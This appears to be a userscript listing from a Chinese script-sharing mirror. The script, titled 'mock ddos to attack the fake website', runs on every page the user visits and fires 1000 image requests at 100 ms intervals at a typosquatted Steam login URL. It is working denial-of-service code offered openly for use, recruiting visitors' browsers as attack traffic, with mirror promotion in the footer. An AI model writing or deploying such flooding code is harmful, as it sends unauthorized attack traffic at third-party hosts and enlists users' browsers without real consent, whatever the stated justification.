mock ddos to attack the fake website

ddos钓鱼网站

  1. // ==UserScript==
  2. // @name mock ddos to attack the fake website
  3. // @author burningall
  4. // @description ddos钓鱼网站
  5. // @version 2016.1.25
  6. // @include *
  7. // @run-at document-start
  8. // @compatible chrome 完美运行
  9. // @compatible firefox 完美运行
  10. // @license The MIT License (MIT); http://opensource.org/licenses/MIT
  11. // @supportURL http://www.burningall.com
  12. // @contributionURL troy450409405@gmail.com|alipay.com
  13. // @namespace https://gf.qytechs.cn/zh-CN/users/3400-axetroy
  14. // ==/UserScript==
  15.  
  16. (function () {
  17. // ddos地址
  18. var url = '//steamcommuunity.com/login/home',
  19. // 每隔多少ms发送一次请求
  20. delay = 100,
  21. // 请求次数
  22. times = 1000,
  23. // 以下不要修改
  24. count = 0,
  25. pic, rand;
  26.  
  27. function ddos(url) {
  28. pic = new Image();
  29. rand = Math.floor(Math.random() * 1000);
  30. pic.src = url + '?random=' + rand;
  31. }
  32.  
  33. var ddosTimer = setInterval(function () {
  34. if (count >= times) {
  35. clearInterval(ddosTimer);
  36. } else {
  37. ddos(url);
  38. count++;
  39. }
  40. }, delay);
  41. })();

QingJ © 2025

镜像随时可能失效,请加Q群300939539或关注我们的公众号极客氢云获取最新地址